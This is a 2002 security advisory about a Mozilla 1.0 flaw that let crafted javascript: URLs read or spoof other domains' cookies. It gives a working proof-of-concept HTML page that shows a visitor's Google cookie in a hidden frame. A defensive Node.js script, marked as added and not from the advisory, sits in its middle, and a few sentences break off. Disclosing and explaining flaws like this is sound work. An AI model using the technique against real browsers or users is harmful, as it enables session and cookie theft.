
Mozilla cookie can be stolen & spoofed
25th Jul 2002 [SBWID-5555]

	Mozilla cookie can be stolen & spoofed


	Mozilla 1.0


	Thanks to :

	                                                   _     _

	                                                 o' ,=./ `o

	Andreas Sandblad [sandblad@acc.umu.se]              (o o)        advisory [#9]


	Credits to Ingesson, Quitta, Hawkan.







	I originally thought this was an XSS (cross site scripting) issue, but
	soon came to the conclusion that it is limited to a design error in
	restricting access to cookies. Even though Mozilla is open source, I
	have not been studying the source code in order to find and exploit the

	In the beginning I had problems not generating any javascript errors
	when using the javascript URL. My first solution was to make the host
	and path a valid javascript expression. Google.com may be a valid
	expression if google is an object and com is an element/variable of the
	Google object. Further on if Google.com is an int, it is legal to use
	google.com/ 1. Parsing of host and path will stop when a space is

	Well, I soon found a much easier solution. Simply put a // in front of
	the host and path and a \n before the cookie reading code occurs. The
	reason why I didn't find this directly was because the newline must be
	created in a javascript function. It can't be set directly in a
	javascript url.





	Mozilla allows script in the javascript: protocol to set and read
	cookies. For javascript: URLs the host and path used for the cookie
	check are pulled out of the URL text as: "javascript:[host][path]"

	Cookie security is based only on restricting access to a matching
	host and path. By carefully crafting a malicious javascript: URL opened
	in a new frame/iframe/window, it is possible to access and alter
	cookies from other domains.





	The easiest way to exploit the vulnerability is to simply create a
	javascript: URL in a javascript function as:
	javascript://[host]/[path]\n[code to read cookie]
	The // makes the host and path a javascript comment, so they don't
	generate any javascript errors.
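As an added example (not from the advisory and not Mozilla's code), the following Node.js script models the cookie-host derivation described above next to a scheme-aware check that refuses cookie access to javascript: URLs. The URLs, the function names and the simplified domain-matching rule are assumptions made for illustration; the script body in the crafted URL is replaced by a harmless comment.

```javascript
// Added example, not code from the advisory or from Mozilla: a small model of
// the design error the advisory describes (cookie access keyed only on a host
// and path pulled out of the URL string) next to a scheme-aware check that
// refuses cookie access to javascript: URLs. All URLs below are constructed.

const NETWORK_SCHEMES = new Set(["http", "https"]);

// Model of the flawed derivation: strip the scheme, then treat whatever follows
// "//" up to the next "/" as the host. A javascript: URL of the form
// "javascript://www.example.com/\n<script body>" therefore yields the host
// "www.example.com"; the script body after the newline is never looked at.
function naiveCookieHost(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/\s]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Hardened derivation: only network schemes get a cookie host at all, so a
// javascript: URL has no origin to match cookies against, whatever host-like
// text it carries. The scheme check runs before any URL parsing because the
// WHATWG parser strips newlines and would also report a host for such input.
function cookieHost(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m || !NETWORK_SCHEMES.has(m[1].toLowerCase())) return null;
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Simplified domain matching (assumption): a cookie set for "example.com" is
// readable from "example.com" and from any subdomain of it.
function hostMatchesCookieDomain(host, cookieDomain) {
  if (host === null) return false;
  const d = cookieDomain.replace(/^\./, "").toLowerCase();
  return host === d || host.endsWith("." + d);
}

// Access decision: may a document loaded from `url` read cookies of `cookieDomain`?
// `deriveHost` selects which derivation is used, so the two can be compared.
function cookieAccessAllowed(url, cookieDomain, deriveHost = cookieHost) {
  return hostMatchesCookieDomain(deriveHost(url), cookieDomain);
}

// Constructed URLs: a normal page and a javascript: URL shaped like the
// advisory's, with the script body replaced by a comment.
const PAGE_URL = "https://www.example.com/login";
const CRAFTED_URL = "javascript://www.example.com/\n// script body would follow here";

function demo() {
  return {
    naiveHostOfCrafted: naiveCookieHost(CRAFTED_URL),                                      // "www.example.com"
    naiveAllowsCrafted: cookieAccessAllowed(CRAFTED_URL, "example.com", naiveCookieHost), // true: the design error
    hardenedHostOfCrafted: cookieHost(CRAFTED_URL),                                         // null
    hardenedAllowsCrafted: cookieAccessAllowed(CRAFTED_URL, "example.com"),                 // false
    hardenedAllowsPage: cookieAccessAllowed(PAGE_URL, "example.com"),                       // true
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Run it with `node` to see the two derivations side by side: the naive one reports www.example.com for the crafted URL and grants cookie access, while the scheme-aware one returns null and denies it, which is the property a browser's cookie check needs regardless of what the host-like text after javascript:// looks like.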





	Instructions: Put the exploit in an HTML document on a remote server and
	load it with your Mozilla browser to activate the exploit.

	-------------------------- CUT HERE ----------------------------


	Title:      Mozilla cookie stealing/spoofing

	Date:       [2002-07-24]

	Impact:     Steal/spoof arbitrary cookie           _     _

	            using javascript: URLs               o' \,=./ `o

	Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)


	This demo will display your google cookie (must exist).



	<body onload=init()>

	<iframe name=f height=0 width=0 style=visibility:hidden></iframe>

	<script>
	function init(){
	  // The text after javascript:// is taken as host and path for the
	  // cookie check; the \n ends that comment so the code after it runs.
	  f.location = "javascript://www.google.com/\n"+
	    "'<body onload=alert(document.cookie)>'";
	}
	</script>



	-------------------------- CUT HERE ----------------------------






	The author has been working with Mozilla to produce a patch. The problem
	is fixed in Mozilla 1.1 Beta, released 02-07-22.





	Preferences->Advanced->Scripts & Plugins->


	Disable access to cookies using javascript
